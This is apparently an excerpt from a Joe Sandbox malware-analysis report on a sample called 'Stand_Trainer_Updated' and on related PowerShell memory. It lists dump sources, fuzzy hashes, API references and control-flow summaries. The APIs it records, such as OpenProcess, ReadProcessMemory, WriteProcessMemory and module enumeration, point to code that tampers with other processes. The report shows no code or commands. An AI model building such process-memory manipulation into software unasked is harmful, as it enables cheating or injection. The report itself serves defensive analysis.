• Instruction ID: 5fed89c49af1dbeb62367af2975162f7703696fcc157d05d6249d45a844ecea5
• Opcode Fuzzy Hash: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
• Instruction Fuzzy Hash: BE51A3A2A29AC684FE17DB35EC452B86361BF44BD0F840631DA5D9BBD5DEBCE0608300
APIs
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: MemoryProcess$Writefreememcpy$Read_invalid_parameter_noinfo_noreturnmalloc
• String ID:
• API String ID: 1560051262-0
• Opcode ID: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
• Instruction ID: cec7b178e0c6142886dc51615b969784738ff98a3b033dd6de5584d0606fc9ac
• Opcode Fuzzy Hash: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
• Instruction Fuzzy Hash: 966160A7A29BC281FA138B25EC442697364FB85BD0F540132DA9D93B64DFBCE5A1C700
APIs
• ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FFB226536D9), ref: 00007FFB22653F5B
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB2265401D
• memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB2265405D
  • Part of subcall function 00007FFB22654920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB2265103E), ref: 00007FFB2265493A
• memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB22654070
• Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB226540AD
Strings
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: memcpy$Concurrency::cancel_current_taskXout_of_range@std@@_invalid_parameter_noinfo_noreturnmalloc
• String ID: invalid vector subscript
• API String ID: 225515916-1949860628
• Opcode ID: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
• Instruction ID: 708b29b69421e4657494a7dedc97d5ae1024d0ffda4b78d99d134403fc90417a
• Opcode Fuzzy Hash: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
• Instruction Fuzzy Hash: B931A0A3628AC581E916DF36EC041B9A7A0BF54BE0F284531DE6D97BD5CEBCE061C300
APIs
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: MemoryProcessReadmemcmp
• String ID:
• API String ID: 3176920756-0
• Opcode ID: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
• Instruction ID: d0e24bf9b281c8569980135ae1885994498e490f36327a8337c0c93aea23d6bc
• Opcode Fuzzy Hash: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
• Instruction Fuzzy Hash: 64C14DB3A25AC589FB128F35DC442A83361FB58B88F484531EA5D97B99CFBCD5A1C340
APIs
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: Module32$CreateFirstNextOpenProcessSnapshotToolhelp32memcmp
• String ID:
• API String ID: 3551813145-0
• Opcode ID: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
• Instruction ID: 62dbbb4226a64fa49c8f7e36418501b6c9b73fe90cb3541c4de4c476c747c6c0
• Opcode Fuzzy Hash: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
• Instruction Fuzzy Hash: 5E413C72519B8185E7628F21FC4426AB3A4FB887A4F458234DADD83B94EFBCD5A5C700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: MemoryProcessWrite$free
• String ID: AND NotAvailableInAutoshow=0
• API String ID: 3251193346-2000189202
• Opcode ID: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
• Instruction ID: ee6c4ca90c8b7cdf20ef23b5662890266d699200136b9b8f5afda2c6ce9c4e86
• Opcode Fuzzy Hash: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
• Instruction Fuzzy Hash: 6A11DBB6A29AC681FA538B25EC543693360FF84B84F944436C94E93724CFBDE565C700
APIs
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E46
• malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E51
• ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E88
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653EEC
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: free$MemoryProcessReadmalloc
• String ID:
• API String ID: 945422901-0
• Opcode ID: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
• Instruction ID: 253cec4dcbec4393d4e7dc6c96cb10c3b1ec06813f31f24e8d867f61723c81f8
• Opcode Fuzzy Hash: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
• Instruction Fuzzy Hash: 28419C63A19BC581EA52CF26ED042B8A7A0FB48F84F5C4036EE4D87744DFB8D4A1C340
APIs
• ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FFB226514AB
  • Part of subcall function 00007FFB22654920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB2265103E), ref: 00007FFB2265493A
  • Part of subcall function 00007FFB22653B70: memcpy.VCRUNTIME140 ref: 00007FFB22653C75
  • Part of subcall function 00007FFB22653B70: memcpy.VCRUNTIME140 ref: 00007FFB22653C8F
  • Part of subcall function 00007FFB22653B70: memset.VCRUNTIME140 ref: 00007FFB22653CA4
  • Part of subcall function 00007FFB22653B70: memset.VCRUNTIME140 ref: 00007FFB22653CE7
Strings
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: memcpymemset$Xlength_error@std@@malloc
• String ID: Cost=0$string too long
• API String ID: 2569986753-2966528296
• Opcode ID: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
• Instruction ID: 8df0f71b0a2f11fa489688069611e35e072a9eea3d980dacffba5fe4208cbaa2
• Opcode Fuzzy Hash: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
• Instruction Fuzzy Hash: 4E3119A2929AC685FA039F29EC453A97360FF95B84F405235D94D97761DFBCE1A1C300

Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph (flattened graph text, 3 nodes): node 8817 (7ffaac676c34) -> node 8818 (7ffaac676c3d, LoadLibraryExW) -> node 8820 (7ffaac676ced)

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1755549427.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac660000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 5bd69cadf7f6a856c640e5c62bc9ffbbeee1519b90ef20fd98c7a4a7bd8498b4
• Instruction ID: f82dbb9345d4c542fa60109c31514d79cfacb782380d255c11ae5492efc28020
• Opcode Fuzzy Hash: 5bd69cadf7f6a856c640e5c62bc9ffbbeee1519b90ef20fd98c7a4a7bd8498b4
• Instruction Fuzzy Hash: 3131F53190CA5C8FEB19DB68D849BE9BBE1FF56320F04826BD00DD3152CB74A405CB91

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1755549427.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac660000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• API String ID: 1029625771-0
• Opcode ID: ab3e157c70d3e9aedc6233fd1dd314cefab1a4e824219b88af2bdf68862e7900
• Instruction ID: 114bd9dd7bf3dea2d3dbca6a9b8bc4e627b6b11d82e630985e05231a11bf443d
• Opcode Fuzzy Hash: ab3e157c70d3e9aedc6233fd1dd314cefab1a4e824219b88af2bdf68862e7900
• Instruction Fuzzy Hash: F2217E71908A1C9FEB58DB58D449BF9BBE1FB69321F00822ED00ED3651DB71A8458B81

Control-flow Graph

Memory Dump Source
• Source File: 0000000C.00000002.1756966131.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac730000_powershell.jbxd
Similarity
• Opcode ID: c657d8144bfd834b4e7e5ccc1212b754fb6c51b8584a2230183ca7971b345fc3
• Instruction ID: 499452973a152c48df5eb729b60f1bc35fabc8804e6515a6e1f41b1bd3dbae1f
• Opcode Fuzzy Hash: c657d8144bfd834b4e7e5ccc1212b754fb6c51b8584a2230183ca7971b345fc3
• Instruction Fuzzy Hash: 34C13A61A0EA8A8FF765EB6C88555B97BE0EF46320B0441BED44DC7293DE18DC0AC3D1

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: basic blocks 7ffaac7335e3 through 7ffaac73378b, entry block 7ffaac7335e3 (edge list not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.1756966131.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac730000_powershell.jbxd
Similarity
• Opcode ID: 39fa871fba6f15fad6c9ab856cd744775383527fbd363a44f08770d70b7d48ca
• Instruction ID: 06bed7b9d3b7f81676ae78f1def3748c40bd241599c0e27fb9cd51f54854c29f
• Opcode Fuzzy Hash: 39fa871fba6f15fad6c9ab856cd744775383527fbd363a44f08770d70b7d48ca
• Instruction Fuzzy Hash: 99119421B0E649CFF764DB5C84445B877E1EF55321F1450BED04ED7283DE19980A83D1